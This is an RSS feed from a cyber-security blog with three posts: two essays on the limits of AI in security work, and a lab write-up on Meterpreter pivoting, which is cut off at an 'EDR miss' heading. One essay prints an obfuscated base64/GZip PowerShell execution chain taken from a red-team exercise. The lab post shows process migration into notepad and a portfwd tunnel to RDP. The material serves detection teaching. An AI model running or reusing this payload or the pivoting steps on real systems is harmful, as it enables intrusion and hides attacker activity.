<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
    <channel>
        <title>This Insecure World</title>
        <link>https://thisinsecureworld.com/</link>
        <description>Recent content on This Insecure World</description>
        <generator>Hugo -- gohugo.io</generator>
        <language>en-us</language>
        <lastBuildDate>Sun, 07 Jun 2026 00:36:31 +1300</lastBuildDate><atom:link href="https://thisinsecureworld.com/index.xml" rel="self" type="application/rss+xml" /><item>
        <title>AI and the Blank Page Problem</title>
        <link>https://thisinsecureworld.com/p/ai-and-the-blank-page-problem/</link>
        <pubDate>Sun, 07 Jun 2026 00:36:31 +1300</pubDate>
        
        <guid>https://thisinsecureworld.com/p/ai-and-the-blank-page-problem/</guid>
        <description>&lt;p&gt;&lt;em&gt;Part 2 of an ongoing series on where AI lets me down.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I work in cyber security, and the pressure to use AI at work has become fairly insistent over the last few months. Before I get into where I think it&amp;rsquo;s letting me down, I want to tell you about Jahreese.&lt;/p&gt;
&lt;p&gt;When I was 12, my English writing teacher decided to use an inspirational picture book to show us how creativity works. She had the whole class gather round, and showed us each picture, slowly, with the intention we&amp;rsquo;d be silent and quietly thinking about what we were looking at. Here&amp;rsquo;s a picture similar to the one I remember in my mind when I think of this:&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/ai-and-the-blank-page-problem/image.jpg&#34;
	width=&#34;1600&#34;
	height=&#34;987&#34;
	srcset=&#34;https://thisinsecureworld.com/p/ai-and-the-blank-page-problem/image_hu_12fe858b89290cde.jpg 480w, https://thisinsecureworld.com/p/ai-and-the-blank-page-problem/image_hu_6c19a28249048a8f.jpg 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;It wasn’t this. The picture in my mind was far more Pratchett-y, but this will do.&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;162&#34;
		data-flex-basis=&#34;389px&#34;
	
&gt;&lt;/p&gt;
&lt;p&gt;Image taken from &lt;a class=&#34;link&#34; href=&#34;https://www.dreamstime.com/chair-floating-black-balloons-clouds-whimsical-surreal-concept-image344975994&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Dreamstime&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Jahreese was a funny little bugger who decided to make a comment on the first thing that came to mind for each image in the book. Once we&amp;rsquo;d seen all the pictures, we headed back to our desks to write a story that was somehow related to the picture we&amp;rsquo;d seen. Four of us chose the chair that was floating away, and all four of us wrote stories that were variations of &amp;ldquo;I must go, my people need me&amp;rdquo;, which was what Jahreese chose to comment on this particular picture.&lt;/p&gt;
&lt;p&gt;Miss Hughes, the rock star, went on to show us stories from other years that she&amp;rsquo;d done this exercise, and the variety was dramatically broader than our class. She went on to explain that we all perceive the world differently, and that in providing commentary on each picture, Jahreese limited our imaginations and inspiration from each picture to the picture plus his comment. It stuck with me.&lt;/p&gt;
&lt;p&gt;Back to AI. My role is fairly specialised and requires a good level of expertise, so I&amp;rsquo;ve been playing with AI to see where it fits. I run into limitations over and over again that I&amp;rsquo;m going to document on this blog so I can figure out where my frustrations actually lie (thank you, rubber duck), as well as enabling my laziness, allowing me to just copy paste this link instead of typing out the same argument each time it comes up.&lt;/p&gt;
&lt;p&gt;I got really excited when I started using AI, because I thought it would solve my &lt;a class=&#34;link&#34; href=&#34;https://thoughtbot.com/blog/the-blank-page-problem&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;blank page problem&lt;/a&gt;. And initially, it seemed to. When I had to write a process, document or guideline, I&amp;rsquo;d quickly bypass the blank page problem by getting Claude to generate an outline for me, or even the first draft, with the intention of changing the content to make it fit for purpose, and in record time.&lt;/p&gt;
&lt;p&gt;But using AI to solve the blank page problem does the same thing Jahreese did to our class, it limits creativity. Whether that matters depends on the work. If I&amp;rsquo;m writing a status update, a meeting agenda, or a runbook for something that&amp;rsquo;s been done a thousand times before, a Claude-shaped first draft is probably close to where I&amp;rsquo;d land anyway. There&amp;rsquo;s no creativity to lose because there wasn&amp;rsquo;t much to be had.&lt;/p&gt;
&lt;p&gt;But the work where I actually earn my keep is the weird stuff, the incident that doesn&amp;rsquo;t fit the usual patterns, the problem nobody&amp;rsquo;s written a runbook for yet. That&amp;rsquo;s exactly where I &lt;em&gt;need&lt;/em&gt; the widest possible thinking, and it&amp;rsquo;s exactly where letting AI write the first draft hurts most. And the worst part is, once I&amp;rsquo;ve read Claude&amp;rsquo;s outline, I can&amp;rsquo;t un-read it. The &amp;ldquo;obvious&amp;rdquo; approach it laid out is now sitting in my head, colouring everything I think of next. Psychologists call this anchoring bias. The class couldn&amp;rsquo;t un-hear Jahreese, and I can&amp;rsquo;t un-see Claude.&lt;/p&gt;
&lt;p&gt;I felt this recently when I was writing a CSIRT Practice Guideline (CPG, thanks, paramedicine) for tech leads spinning up a new incident. The point of the document was to give whoever&amp;rsquo;s leading the response a cognitive aid for the chaos of those first 30 minutes, the stuff that&amp;rsquo;s specific to &lt;em&gt;my team&lt;/em&gt;, in &lt;em&gt;our environment&lt;/em&gt;, with &lt;em&gt;our customers&lt;/em&gt;. I asked Claude for a first draft, expecting to riff off it. What I got back was a cookie-cutter incident-response checklist, half of it lifted from site reliability engineering practices that have almost nothing to do with how a CSIRT handles a real compromise. None of it addressed the specific needs of my team.&lt;/p&gt;
&lt;p&gt;I spent ages trying to make Claude&amp;rsquo;s draft work before I gave up and started over from a blank page. The version I eventually wrote looked nothing like the AI&amp;rsquo;s, but I&amp;rsquo;d burned an afternoon on the detour because I kept trying to salvage the framing instead of asking myself what actually belonged in the document.&lt;/p&gt;
&lt;p&gt;So when I&amp;rsquo;m trying to solve a problem with a bit of novelty, I need to go back to beating my head against the blank page. In beating my head against the blank page, I&amp;rsquo;m allowing myself to fully consider the needs of the eventual solution without any constraints on my imagination for how to get there. As soon as AI drafts the output for me, it&amp;rsquo;s putting me on rails and limiting my creativity, and I&amp;rsquo;m not ok with that.&lt;/p&gt;
&lt;p&gt;I&amp;rsquo;m going to use AI to keep polishing my product, but only after I&amp;rsquo;ve worked out my intended direction, and the draft has my ideas and voice. I&amp;rsquo;m not going to outsource my critical thinking to AI, and I encourage you to do the same. It&amp;rsquo;s worth the effort.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>AI and Foundational Knowledge</title>
        <link>https://thisinsecureworld.com/p/ai-and-foundational-knowledge/</link>
        <pubDate>Mon, 01 Jun 2026 00:36:31 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/ai-and-foundational-knowledge/</guid>
        <description>&lt;p&gt;&lt;em&gt;Part 1 of an ongoing series on where AI lets me down.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;I was having a chat with a friend today (Hi Harvey! We&amp;rsquo;re on the internets!) about how loud he&amp;rsquo;d have to yell, and how much energy and heat that would take, for him to yell &amp;ldquo;HI TP&amp;rdquo; from Queensland and be heard over in Ashburton, New Zealand. I wanted to make a joke about him burning himself to cinders in the attempt, but I didn&amp;rsquo;t know the physics well enough to do the math.&lt;/p&gt;
&lt;p&gt;My first instinct was to ask Claude. Then I realised: if Claude forgot to factor in Doctor Physic&amp;rsquo;s Nineteenth Law of Thermodynamics and threw the answer off by a billion degrees (celsius, because I&amp;rsquo;m not a monster), I&amp;rsquo;d have literally no way of knowing.&lt;/p&gt;
&lt;p&gt;And that&amp;rsquo;s the kicker. AI gets things wrong, sure, everyone knows that. But the problem isn&amp;rsquo;t the wrong answer, it&amp;rsquo;s that catching the wrong answer requires you to already know enough to spot it. If I don&amp;rsquo;t know thermodynamics, Claude can lie to me about thermodynamics all day and I&amp;rsquo;ll thank it for the answer.&lt;/p&gt;
&lt;p&gt;In low-stakes situations like working out how big of a crater Harvey would make, this is fine. The trouble is when AI starts answering questions that actually matter, and the person asking doesn&amp;rsquo;t have the foundation to know when the answer is wrong. I&amp;rsquo;m seeing this in my job. Analysts are asking, for example, Charlotte AI (built into Crowdstrike) what this PowerShell snippet does:&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt;1
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-powershell&#34; data-lang=&#34;powershell&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;n&#34;&gt;JgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcASAA0AHMASQAnACsAJwBBAEMAOAB2AHAAVwBrAEMAQQAwAHQATgB6AHMAaABYAEsATQAwAHIAVABpAHsAMAB9AHkATABjAHEAMwB6AGsAegBUAFUATgBHAEkARABxADQAcwBMAGsAbgBOADEAWABQAE4ASwA4AHMAcwB5AHMALwBMAFQAYwAwAHIAaQAnACsAJwBiAFcAeQBDAGkAagBLAFQAMAA0AHQATABzADQAdgBjAHMANAB2AHoAUwB2AFIAVgBOAEIATgBMADEARQB7ADEAfQAxAEYAUwBvAFYAawBnAEYAbQBxAEMAaABWAEYASgBVAG0AcQBxAGsAcQBWAEIAcgBEAGUAWQByAGUAQgBjADUAbABYAGkARgA1AEUAVQBCAEEATgBzAGgAOAA0AGwAZgBBAEEAQQBBACcAKQAtAGYAJwA5ACcALAAnAHcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApAGUAYwBoAG8AIAAnAEcAbwBSAE0AcQB4AFcAagAnADsA&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;-InputFormat&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;None&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;Charlotte confidently answered:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;is decoded to &lt;code&gt;echo &#39;GoRMqxWj&#39;;&lt;/code&gt;. The &lt;code&gt;-InputFormat None&lt;/code&gt; parameter specifies that no input format is expected, which is useful for commands that do not require input.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;If you&amp;rsquo;ve spent any time looking at PowerShell attacks, the shape of this snippet is immediately familiar: it&amp;rsquo;s a classic obfuscation chain, and it&amp;rsquo;s probably dropping an implant in memory.&lt;sup id=&#34;fnref:1&#34;&gt;&lt;a href=&#34;#fn:1&#34; class=&#34;footnote-ref&#34; role=&#34;doc-noteref&#34;&gt;1&lt;/a&gt;&lt;/sup&gt; What Charlotte did was find the innermost string at the end of the chain (the harmless &lt;code&gt;echo&lt;/code&gt;) and report that as the answer, ignoring the four layers of &lt;code&gt;Invoke-Expression&lt;/code&gt;-style wrapping around it. Worse, it did so without any hint of uncertainty.&lt;/p&gt;
&lt;p&gt;By design, AI is trained to sound 100% confident in its output, that&amp;rsquo;s how the system works. But come on. In this case, the analyst took Charlotte&amp;rsquo;s answer at face value and closed the alert as a false positive. We were lucky: this particular PowerShell was part of a red team exercise, so we caught it on review. If it had been a real attacker, we&amp;rsquo;d have had a foothold sitting unaddressed in the environment because the analyst who caught the case that day didn&amp;rsquo;t have the foundational PowerShell knowledge to look at the base64 and feel their stomach drop.&lt;/p&gt;
&lt;p&gt;This isn&amp;rsquo;t new. Lawyers are being &lt;a class=&#34;link&#34; href=&#34;https://www.theguardian.com/law/2025/sep/03/lawyer-caught-using-ai-generated-false-citations-in-court-case-penalised-in-australian-first&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;sanctioned&lt;/a&gt; for submitting briefs to court with hallucinated precedents. Big-4 consulting firms are &lt;a class=&#34;link&#34; href=&#34;https://www.theguardian.com/australia-news/2025/oct/06/deloitte-to-refund-australian-government-after-using-ai-in-440000-report&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;refunding hundreds of thousands of dollars&lt;/a&gt; for reports padded with hallucinated references. &lt;a class=&#34;link&#34; href=&#34;https://www.nature.com/articles/d41586-026-00969-z&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Academia is rife with the same&lt;/a&gt;. People making mistakes that can just as easily be made by humans, except the AI&amp;rsquo;s volume and confidence make those mistakes faster and harder to catch.&lt;/p&gt;
&lt;p&gt;For me, in cyber security, the stakes are the same shape. We miss a system during a compromise, miss data leaving the environment, close a true positive as a false positive. These are resume-generating events. The thing that protects us is the analyst who knows what bad PowerShell looks like, the responder who knows what a normal day on the network feels like, the engineer who knows what their detection rules can and can&amp;rsquo;t see. Foundational knowledge. Pattern recognition built up over years of being wrong, being corrected, and trying again.&lt;/p&gt;
&lt;p&gt;And here&amp;rsquo;s what worries me. The narrative right now is &amp;ldquo;lay off your junior developers or SOC analysts, you don&amp;rsquo;t need them, AI can do the work for them&amp;rdquo;. But the work juniors do isn&amp;rsquo;t just &lt;em&gt;output&lt;/em&gt;, it&amp;rsquo;s how they build the foundational knowledge that lets them catch AI being wrong five years from now. If we replace that supervised, on-the-job, getting-things-wrong-and-being-corrected practice with an AI that confidently produces the answer, we don&amp;rsquo;t get the same seniors faster. We get no seniors at all. The people protecting the business from AI, the ones who can look at a base64 string and know to escalate, just don&amp;rsquo;t exist anymore. I don&amp;rsquo;t know how we fix this, and it scares me.&lt;/p&gt;
&lt;hr&gt;
&lt;div style=&#34;text-align: center;&#34;&gt;
&lt;p&gt;&lt;em&gt;For those of you who are curious: Harvey didn&amp;rsquo;t spontaneously combust. He decided not to call out in the end. It was late, and it might have been inconsiderate to the neighbours.&lt;/em&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&#34;footnotes&#34; role=&#34;doc-endnotes&#34;&gt;
&lt;hr&gt;
&lt;ol&gt;
&lt;li id=&#34;fn:1&#34;&gt;
&lt;p&gt;Specifically: UTF-16 base64 wrapping a GZip-compressed payload, which decompresses to more PowerShell, which decodes a base64 string, which finally executes.&amp;#160;&lt;a href=&#34;#fnref:1&#34; class=&#34;footnote-backref&#34; role=&#34;doc-backlink&#34;&gt;&amp;#x21a9;&amp;#xfe0e;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;/div&gt;
</description>
        </item>
        <item>
        <title>Pivoting, RDP, and why notepad talking to 3389 is suss</title>
        <link>https://thisinsecureworld.com/p/pivoting-rdp-and-why-notepad-talking-to-3389-is-suss/</link>
        <pubDate>Fri, 01 May 2026 00:00:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/pivoting-rdp-and-why-notepad-talking-to-3389-is-suss/</guid>
        <description>&lt;p&gt;I’ve been messing about in a lab lately with pivoting; routing your traffic &lt;em&gt;through&lt;/em&gt; something you already own so you can get to ports and networks you shouldn’t be able to touch directly. One of the funnier outcomes is watching a Windows host look like it’s &lt;strong&gt;RDP&amp;rsquo;ing into itself&lt;/strong&gt;, which sounds absurd until you line up the sockets and the PIDs.&lt;/p&gt;
&lt;h2 id=&#34;the-bit-that-looks-weird-in-netstat&#34;&gt;The bit that looks weird in netstat
&lt;/h2&gt;&lt;p&gt;You’ve probably seen &lt;code&gt;svchost&lt;/code&gt; listening on 3389 a thousand times. That’s fine. That’s Windows doing Windows things. What’s less fine is when &lt;strong&gt;notepad.exe&lt;/strong&gt; shows up with an established connection to loopback RDP.&lt;/p&gt;
&lt;p&gt;Here’s what I was looking at on the victim (domain controller in this lab):&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt;1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;2
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;3
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;4
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;5
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;6
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;7
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;C:\Users\svc_vault&amp;gt;netstat -ano | findstr 3389
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING       896
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  TCP    127.0.0.1:3389         127.0.0.1:49431        ESTABLISHED     896
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  TCP    127.0.0.1:49431        127.0.0.1:3389         ESTABLISHED     7064
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  TCP    [::]:3389              [::]:0                 LISTENING       896
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  UDP    0.0.0.0:3389           *:*                                    896
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;  UDP    [::]:3389              *:*                                    896
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;So who’s 7064, and who’s 896?&lt;/p&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt; 1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 2
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 3
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 4
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 5
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 6
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 7
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 8
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 9
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;10
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;11
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;C:\Users\svc_vault&amp;gt;tasklist /FI &amp;#34;PID eq 7064&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Image Name                     PID Session Name        Session#    Mem Usage
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;========================= ======== ================ =========== ============
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;notepad.exe                   7064 RDP-Tcp#7                  5     15,420 K
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;C:\Users\svc_vault&amp;gt;tasklist /FI &amp;#34;PID eq 896&amp;#34;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Image Name                     PID Session Name        Session#    Mem Usage
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;========================= ======== ================ =========== ============
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;svchost.exe                    896 Services                   0     48,100 K
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;896 listening on 3389? Normal. &lt;strong&gt;7064 talking to 127.0.0.1:3389?&lt;/strong&gt; That’s the bit that should make you go &amp;ldquo;hang on a minute&amp;rdquo;.&lt;/p&gt;
&lt;h2 id=&#34;what-i-actually-did-to-get-there&#34;&gt;What I actually did to get there
&lt;/h2&gt;&lt;p&gt;This was a toy chain, but it’s the same shape you see in the wild when someone’s trying to hide where the RDP is really coming from.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Compromise the host (scheduled task, Metasploit implant, you know the drill).&lt;/li&gt;
&lt;li&gt;Spawn notepad from Meterpreter, then &lt;strong&gt;migrate&lt;/strong&gt; the implant into it (DLL injection / process migration; pick your favourite euphemism for &amp;ldquo;my evil code now lives in someone else’s process&amp;rdquo;).&lt;/li&gt;
&lt;li&gt;On the &lt;strong&gt;attacker&lt;/strong&gt; box, add a forward so anything I send to a local port gets tunnelled through the implant to RDP on the target. In my case that looked like:&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&#34;highlight&#34;&gt;&lt;div class=&#34;chroma&#34;&gt;
&lt;table class=&#34;lntable&#34;&gt;&lt;tr&gt;&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code&gt;&lt;span class=&#34;lnt&#34;&gt; 1
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 2
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 3
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 4
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 5
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 6
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 7
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 8
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt; 9
&lt;/span&gt;&lt;span class=&#34;lnt&#34;&gt;10
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;
&lt;td class=&#34;lntd&#34;&gt;
&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-fallback&#34; data-lang=&#34;fallback&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;meterpreter &amp;gt; portfwd list
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;Active Port Forwards
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;====================
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;   Index  Local          Remote          Direction
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;   -----  -----          ------          ---------
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;   1      0.0.0.0:13389  127.0.0.1:3389  Forward
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;1 total active port forwards.
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;p&gt;So when I point &lt;code&gt;xfreerdp&lt;/code&gt; (or mstsc, or whatever) at &lt;code&gt;127.0.0.1:13389&lt;/code&gt; on &lt;strong&gt;my&lt;/strong&gt; machine, the bytes go through Metasploit and pop out on the victim as traffic to &lt;code&gt;127.0.0.1:3389&lt;/code&gt;. From the DC’s point of view it can look like the machine is connecting to its own RDP stack, because that’s literally where the forward lands—even though the thing holding the client end of the weirdness is &lt;strong&gt;notepad&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;(The flow diagram below is one of the AI generated ones—RDP client → tunnel → pivot → Windows → implant → &lt;code&gt;127.0.0.1:3389&lt;/code&gt;.)&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/pivoting-rdp-and-why-notepad-talking-to-3389-is-suss/rdp-tunnel-via-pivot.png&#34;
	width=&#34;1024&#34;
	height=&#34;571&#34;
	srcset=&#34;https://thisinsecureworld.com/p/pivoting-rdp-and-why-notepad-talking-to-3389-is-suss/rdp-tunnel-via-pivot_hu_2e50d965dc1dc7ef.png 480w, https://thisinsecureworld.com/p/pivoting-rdp-and-why-notepad-talking-to-3389-is-suss/rdp-tunnel-via-pivot_hu_86ba0cae228b49a2.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;AI-generated diagram: RDP tunnel via pivot host and implant to local RDP&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;179&#34;
		data-flex-basis=&#34;430px&#34;
	
&gt;&lt;/p&gt;
&lt;h2 id=&#34;why-i-care-about-pivoting-when-im-scoping-an-incident&#34;&gt;Why I care about pivoting when I’m scoping an incident
&lt;/h2&gt;&lt;p&gt;Not every compromised box gets a clean line back to C2. Sometimes you’ve got decent network controls north–south, and the operator ends up bouncing &lt;strong&gt;client3 → client2 → client1 → C2&lt;/strong&gt;—a giant game of chinese whispers where each hop is a forward, a proxy, or someone reusing creds on a box they shouldn’t be on.&lt;/p&gt;
&lt;p&gt;When that’s happening, I’m not asking “is dllhost allowed to exist?” (it is). I’m asking &lt;strong&gt;why dllhost (or SearchHost, or RuntimeBroker, or whatever) is talking to &lt;em&gt;that&lt;/em&gt; host on &lt;em&gt;that&lt;/em&gt; port&lt;/strong&gt;, and whether that edge belongs in my mental graph of the intrusion.&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/pivoting-rdp-and-why-notepad-talking-to-3389-is-suss/lateral-movement-chain.png&#34;
	width=&#34;1024&#34;
	height=&#34;571&#34;
	srcset=&#34;https://thisinsecureworld.com/p/pivoting-rdp-and-why-notepad-talking-to-3389-is-suss/lateral-movement-chain_hu_3138ca8216b958c1.png 480w, https://thisinsecureworld.com/p/pivoting-rdp-and-why-notepad-talking-to-3389-is-suss/lateral-movement-chain_hu_d71f1522b1771bd.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;AI-generated diagram: lateral movement and pivot chain&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;179&#34;
		data-flex-basis=&#34;430px&#34;
	
&gt;&lt;/p&gt;
&lt;h2 id=&#34;the-edr-miss&#34;&gt;The EDR miss
